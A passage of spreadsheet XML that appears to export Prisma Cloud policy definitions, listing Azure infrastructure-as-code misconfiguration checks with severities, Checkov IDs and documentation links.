      <c r="F1357" t="inlineStr"/>
      <c r="G1357" t="b">
        <v>1</v>
      </c>
      <c r="H13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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1357" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-application</t>
        </is>
      </c>
      <c r="K1357" t="inlineStr">
        <is>
          <t>Azure application gateway does not have WAF enabled</t>
        </is>
      </c>
      <c r="L1357" t="inlineStr"/>
      <c r="M1357" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1357" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1357" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1357" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1357" t="inlineStr"/>
      <c r="R1357" t="inlineStr"/>
      <c r="S1357" t="inlineStr"/>
      <c r="T1357" t="b">
        <v>0</v>
      </c>
      <c r="U1357" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1357" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-application-gateway</t>
        </is>
      </c>
      <c r="W1357" t="inlineStr">
        <is>
          <t>Ensure that Application Gateway enables WAF</t>
        </is>
      </c>
      <c r="X1357" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-application-gateway-enables-waf</t>
        </is>
      </c>
      <c r="Y1357" t="inlineStr"/>
      <c r="Z1357" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_application_gateway"]}</t>
        </is>
      </c>
      <c r="AA1357" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1357" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1357" t="inlineStr">
        <is>
          <t>CKV_AZURE_120</t>
        </is>
      </c>
      <c r="AD1357" t="b">
        <v>1</v>
      </c>
      <c r="AE1357" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1357" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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7" t="inlineStr">
        <is>
          <t>ff7f6448-42a0-47fd-9e00-cb8b3cf21f0a</t>
        </is>
      </c>
      <c r="AI1357" t="inlineStr"/>
      <c r="AJ1357" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1357" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1358">
      <c r="A1358" t="inlineStr"/>
      <c r="B1358" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1358" s="2" t="inlineStr"/>
      <c r="D1358" t="inlineStr"/>
      <c r="E1358" t="inlineStr"/>
      <c r="F1358" t="inlineStr"/>
      <c r="G1358" t="b">
        <v>1</v>
      </c>
      <c r="H13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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1358" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-cdn</t>
        </is>
      </c>
      <c r="K1358" t="inlineStr">
        <is>
          <t>Azure CDN Doesn't Disable HTTP Endpoint</t>
        </is>
      </c>
      <c r="L1358" t="inlineStr"/>
      <c r="M1358" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1358" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1358" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1358" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1358" t="inlineStr"/>
      <c r="R1358" t="inlineStr"/>
      <c r="S1358" t="inlineStr"/>
      <c r="T1358" t="b">
        <v>0</v>
      </c>
      <c r="U1358" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1358" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-cdn-endpoint</t>
        </is>
      </c>
      <c r="W1358" t="inlineStr">
        <is>
          <t>Ensure the Azure CDN disables the HTTP endpoint</t>
        </is>
      </c>
      <c r="X1358" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-197</t>
        </is>
      </c>
      <c r="Y1358" t="inlineStr"/>
      <c r="Z1358" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_cdn_endpoint"]}</t>
        </is>
      </c>
      <c r="AA1358" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1358" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1358" t="inlineStr">
        <is>
          <t>CKV_AZURE_197</t>
        </is>
      </c>
      <c r="AD1358" t="b">
        <v>1</v>
      </c>
      <c r="AE1358" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1358" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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8" t="inlineStr">
        <is>
          <t>0e1e8786-06c7-4ff0-978d-a33593afcb6a</t>
        </is>
      </c>
      <c r="AI1358" t="inlineStr"/>
      <c r="AJ1358" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1358" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1359">
      <c r="A1359" t="inlineStr"/>
      <c r="B1359" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1359" s="2" t="inlineStr"/>
      <c r="D1359" t="inlineStr"/>
      <c r="E1359" t="inlineStr"/>
      <c r="F1359" t="inlineStr"/>
      <c r="G1359" t="b">
        <v>1</v>
      </c>
      <c r="H13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59" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1359" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-cdn</t>
        </is>
      </c>
      <c r="K1359" t="inlineStr">
        <is>
          <t>Azure CDN Using Outdated TLS Encryption</t>
        </is>
      </c>
      <c r="L1359" t="inlineStr"/>
      <c r="M1359" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1359" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1359" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1359" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1359" t="inlineStr"/>
      <c r="R1359" t="inlineStr"/>
      <c r="S1359" t="inlineStr"/>
      <c r="T1359" t="b">
        <v>0</v>
      </c>
      <c r="U1359" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1359" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-cdn-endpoint-custom-domain</t>
        </is>
      </c>
      <c r="W1359" t="inlineStr">
        <is>
          <t>Ensure the Azure CDN endpoint is using the latest version of TLS encryption</t>
        </is>
      </c>
      <c r="X1359" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-200</t>
        </is>
      </c>
      <c r="Y1359" t="inlineStr"/>
      <c r="Z1359" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_cdn_endpoint_custom_domain"]}</t>
        </is>
      </c>
      <c r="AA1359" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1359" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1359" t="inlineStr">
        <is>
          <t>CKV_AZURE_200</t>
        </is>
      </c>
      <c r="AD1359" t="b">
        <v>1</v>
      </c>
      <c r="AE1359" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1359" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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59" t="inlineStr">
        <is>
          <t>fd1a43a0-8bad-4473-b1be-48c95e485ae8</t>
        </is>
      </c>
      <c r="AI1359" t="inlineStr"/>
      <c r="AJ1359" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1359" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1360">
      <c r="A1360" t="inlineStr"/>
      <c r="B1360" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1360" s="2" t="inlineStr"/>
      <c r="D1360" t="inlineStr"/>
      <c r="E1360" t="inlineStr"/>
      <c r="F1360" t="inlineStr"/>
      <c r="G1360" t="b">
        <v>1</v>
      </c>
      <c r="H13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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1360" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-container</t>
        </is>
      </c>
      <c r="K1360" t="inlineStr">
        <is>
          <t>Azure container container group is not deployed into a virtual network</t>
        </is>
      </c>
      <c r="L1360" t="inlineStr"/>
      <c r="M1360" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1360" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1360" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1360" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1360" t="inlineStr"/>
      <c r="R1360" t="inlineStr"/>
      <c r="S1360" t="inlineStr"/>
      <c r="T1360" t="b">
        <v>0</v>
      </c>
      <c r="U1360" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1360" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-container-group</t>
        </is>
      </c>
      <c r="W1360" t="inlineStr">
        <is>
          <t>Ensure that Azure Container group is deployed into virtual network</t>
        </is>
      </c>
      <c r="X1360" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-container-container-group-is-deployed-into-virtual-network</t>
        </is>
      </c>
      <c r="Y1360" t="inlineStr"/>
      <c r="Z1360" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_container_group"]}</t>
        </is>
      </c>
      <c r="AA1360" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1360" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1360" t="inlineStr">
        <is>
          <t>CKV_AZURE_98</t>
        </is>
      </c>
      <c r="AD1360" t="b">
        <v>1</v>
      </c>
      <c r="AE1360" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1360" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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0" t="inlineStr">
        <is>
          <t>dd2feacf-8890-43e9-ab55-651bf3ae1c03</t>
        </is>
      </c>
      <c r="AI1360" t="inlineStr"/>
      <c r="AJ1360" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1360" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1361">
      <c r="A1361" t="inlineStr"/>
      <c r="B1361" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1361" s="2" t="inlineStr"/>
      <c r="D1361" t="inlineStr"/>
      <c r="E1361" t="inlineStr"/>
      <c r="F1361" t="inlineStr"/>
      <c r="G1361" t="b">
        <v>1</v>
      </c>
      <c r="H13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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1361" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-container</t>
        </is>
      </c>
      <c r="K1361" t="inlineStr">
        <is>
          <t>Geo-Replicated Not Enabled for Azure Container Registry (ACR)</t>
        </is>
      </c>
      <c r="L1361" t="inlineStr"/>
      <c r="M1361" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1361" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1361" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1361" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1361" t="inlineStr"/>
      <c r="R1361" t="inlineStr"/>
      <c r="S1361" t="inlineStr"/>
      <c r="T1361" t="b">
        <v>0</v>
      </c>
      <c r="U1361" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1361" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-container-registry</t>
        </is>
      </c>
      <c r="W1361" t="inlineStr">
        <is>
          <t>Ensure geo-replicated container registries to match multi-region container deployments.</t>
        </is>
      </c>
      <c r="X1361" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-165</t>
        </is>
      </c>
      <c r="Y1361" t="inlineStr"/>
      <c r="Z1361" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_container_registry"]}</t>
        </is>
      </c>
      <c r="AA1361" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1361" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1361" t="inlineStr">
        <is>
          <t>CKV_AZURE_165</t>
        </is>
      </c>
      <c r="AD1361" t="b">
        <v>1</v>
      </c>
      <c r="AE1361" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1361" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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1" t="inlineStr">
        <is>
          <t>57fd8398-2883-4bbb-bfa2-37e6d949ac10</t>
        </is>
      </c>
      <c r="AI1361" t="inlineStr"/>
      <c r="AJ1361" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1361" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1362">
      <c r="A1362" t="inlineStr"/>
      <c r="B1362" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1362" s="2" t="inlineStr"/>
      <c r="D1362" t="inlineStr"/>
      <c r="E1362" t="inlineStr"/>
      <c r="F1362" t="inlineStr"/>
      <c r="G1362" t="b">
        <v>1</v>
      </c>
      <c r="H13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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1362" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-cosmosdb</t>
        </is>
      </c>
      <c r="K1362" t="inlineStr">
        <is>
          <t>Azure Cosmos DB enables public network access</t>
        </is>
      </c>
      <c r="L1362" t="inlineStr"/>
      <c r="M1362" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1362" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1362" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1362" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1362" t="inlineStr"/>
      <c r="R1362" t="inlineStr"/>
      <c r="S1362" t="inlineStr"/>
      <c r="T1362" t="b">
        <v>0</v>
      </c>
      <c r="U1362" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1362" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-cosmosdb-account</t>
        </is>
      </c>
      <c r="W1362" t="inlineStr">
        <is>
          <t>Ensure that Azure Cosmos DB disables public network access</t>
        </is>
      </c>
      <c r="X1362" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-cosmos-db-disables-public-network-access</t>
        </is>
      </c>
      <c r="Y1362" t="inlineStr"/>
      <c r="Z1362" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_cosmosdb_account"]}</t>
        </is>
      </c>
      <c r="AA1362" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1362" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1362" t="inlineStr">
        <is>
          <t>CKV_AZURE_101</t>
        </is>
      </c>
      <c r="AD1362" t="b">
        <v>1</v>
      </c>
      <c r="AE1362" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1362" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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2" t="inlineStr">
        <is>
          <t>24bcd432-30aa-4ec4-b379-c3d5a69cbd54</t>
        </is>
      </c>
      <c r="AI1362" t="inlineStr"/>
      <c r="AJ1362" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1362" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1363">
      <c r="A1363" t="inlineStr"/>
      <c r="B1363" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1363" s="2" t="inlineStr"/>
      <c r="D1363" t="inlineStr"/>
      <c r="E1363" t="inlineStr"/>
      <c r="F1363" t="inlineStr"/>
      <c r="G1363" t="b">
        <v>1</v>
      </c>
      <c r="H13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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1363" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-cosmosdb</t>
        </is>
      </c>
      <c r="K1363" t="inlineStr">
        <is>
          <t>Cosmos DB accounts do not have restricted access</t>
        </is>
      </c>
      <c r="L1363" t="inlineStr"/>
      <c r="M1363" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1363" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1363" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1363" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1363" t="inlineStr"/>
      <c r="R1363" t="inlineStr"/>
      <c r="S1363" t="inlineStr"/>
      <c r="T1363" t="b">
        <v>0</v>
      </c>
      <c r="U1363" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1363" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-cosmosdb-account</t>
        </is>
      </c>
      <c r="W1363" t="inlineStr">
        <is>
          <t>Ensure Cosmos DB accounts have restricted access</t>
        </is>
      </c>
      <c r="X1363" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-cosmos-db-accounts-have-restricted-access</t>
        </is>
      </c>
      <c r="Y1363" t="inlineStr"/>
      <c r="Z1363" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_cosmosdb_account"]}</t>
        </is>
      </c>
      <c r="AA1363" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1363" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1363" t="inlineStr">
        <is>
          <t>CKV_AZURE_99</t>
        </is>
      </c>
      <c r="AD1363" t="b">
        <v>1</v>
      </c>
      <c r="AE1363" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1363" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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3" t="inlineStr">
        <is>
          <t>a778e484-5b56-47ad-b51a-12cd8f688e92</t>
        </is>
      </c>
      <c r="AI1363" t="inlineStr"/>
      <c r="AJ1363" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1363" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1364">
      <c r="A1364" t="inlineStr"/>
      <c r="B1364" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1364" s="2" t="inlineStr"/>
      <c r="D1364" t="inlineStr"/>
      <c r="E1364" t="inlineStr"/>
      <c r="F1364" t="inlineStr"/>
      <c r="G1364" t="b">
        <v>1</v>
      </c>
      <c r="H13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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1364" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-databricks</t>
        </is>
      </c>
      <c r="K1364" t="inlineStr">
        <is>
          <t>Azure Databricks workspace is public</t>
        </is>
      </c>
      <c r="L1364" t="inlineStr"/>
      <c r="M1364" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1364" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1364" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1364" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1364" t="inlineStr"/>
      <c r="R1364" t="inlineStr"/>
      <c r="S1364" t="inlineStr"/>
      <c r="T1364" t="b">
        <v>0</v>
      </c>
      <c r="U1364" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1364" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-databricks-workspace</t>
        </is>
      </c>
      <c r="W1364" t="inlineStr">
        <is>
          <t>Ensure that databricks workspace has not public</t>
        </is>
      </c>
      <c r="X1364" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-azure-databricks-workspace-is-not-public</t>
        </is>
      </c>
      <c r="Y1364" t="inlineStr"/>
      <c r="Z1364" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_databricks_workspace"]}</t>
        </is>
      </c>
      <c r="AA1364" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1364" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1364" t="inlineStr">
        <is>
          <t>CKV_AZURE_158</t>
        </is>
      </c>
      <c r="AD1364" t="b">
        <v>1</v>
      </c>
      <c r="AE1364" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1364" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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4" t="inlineStr">
        <is>
          <t>c4997cfc-33ae-4277-b9f1-41b614b1ba31</t>
        </is>
      </c>
      <c r="AI1364" t="inlineStr"/>
      <c r="AJ1364" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1364" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1365">
      <c r="A1365" t="inlineStr"/>
      <c r="B1365" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1365" s="2" t="inlineStr"/>
      <c r="D1365" t="inlineStr"/>
      <c r="E1365" t="inlineStr"/>
      <c r="F1365" t="inlineStr"/>
      <c r="G1365" t="b">
        <v>1</v>
      </c>
      <c r="H13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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1365" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-eventgrid</t>
        </is>
      </c>
      <c r="K1365" t="inlineStr">
        <is>
          <t>Azure Event Grid domain public network access is enabled</t>
        </is>
      </c>
      <c r="L1365" t="inlineStr"/>
      <c r="M1365" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1365" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1365" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1365" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1365" t="inlineStr"/>
      <c r="R1365" t="inlineStr"/>
      <c r="S1365" t="inlineStr"/>
      <c r="T1365" t="b">
        <v>0</v>
      </c>
      <c r="U1365" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1365" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-eventgrid-domain</t>
        </is>
      </c>
      <c r="W1365" t="inlineStr">
        <is>
          <t>Ensure that Azure Event Grid Domain public network access is disabled</t>
        </is>
      </c>
      <c r="X1365" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-event-grid-domain-public-network-access-is-disabled</t>
        </is>
      </c>
      <c r="Y1365" t="inlineStr"/>
      <c r="Z1365" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_eventgrid_domain"]}</t>
        </is>
      </c>
      <c r="AA1365" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1365" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1365" t="inlineStr">
        <is>
          <t>CKV_AZURE_106</t>
        </is>
      </c>
      <c r="AD1365" t="b">
        <v>1</v>
      </c>
      <c r="AE1365" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1365" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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5" t="inlineStr">
        <is>
          <t>58c7b0ec-3c69-4879-bdab-35dd49536d7b</t>
        </is>
      </c>
      <c r="AI1365" t="inlineStr"/>
      <c r="AJ1365" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1365" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1366">
      <c r="A1366" t="inlineStr"/>
      <c r="B1366" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1366" s="2" t="inlineStr"/>
      <c r="D1366" t="inlineStr"/>
      <c r="E1366" t="inlineStr"/>
      <c r="F1366" t="inlineStr"/>
      <c r="G1366" t="b">
        <v>1</v>
      </c>
      <c r="H13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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1366" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-eventgrid</t>
        </is>
      </c>
      <c r="K1366" t="inlineStr">
        <is>
          <t>Azure Event Grid Topic Public Network Access</t>
        </is>
      </c>
      <c r="L1366" t="inlineStr"/>
      <c r="M1366" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1366" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1366" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1366" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1366" t="inlineStr"/>
      <c r="R1366" t="inlineStr"/>
      <c r="S1366" t="inlineStr"/>
      <c r="T1366" t="b">
        <v>0</v>
      </c>
      <c r="U1366" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1366" t="inlineStr">
        <is>
          <t>IaC:Networking:azure-eventgrid-topic</t>
        </is>
      </c>
      <c r="W1366" t="inlineStr">
        <is>
          <t>Ensure public network access is disabled for Azure Event Grid Topic</t>
        </is>
      </c>
      <c r="X1366" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-193</t>
        </is>
      </c>
      <c r="Y1366" t="inlineStr"/>
      <c r="Z1366" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["azurerm_eventgrid_topic"]}</t>
        </is>
      </c>
      <c r="AA1366" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1366" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1366" t="inlineStr">
        <is>
          <t>CKV_AZURE_193</t>
        </is>
      </c>
      <c r="AD1366" t="b">
        <v>1</v>
      </c>
      <c r="AE1366" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1366" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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6" t="inlineStr">
        <is>
          <t>60431b3d-838c-483e-a4f2-6d0f82d75516</t>
        </is>
      </c>
      <c r="AI1366" t="inlineStr"/>
      <c r="AJ1366" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1366" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1367">
      <c r="A1367" t="inlineStr"/>
      <c r="B1367" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1367" s="2" t="inlineStr"/>
      <c r="D1367" t="inlineStr"/>
      <c r="E1367" t="inlineStr"/>
      <c r="F1367" t="inlineStr"/>
      <c r="G1367" t="b">
        <v>1</v>
      </c>
      <c r="H13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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J1367" t="inlineStr">
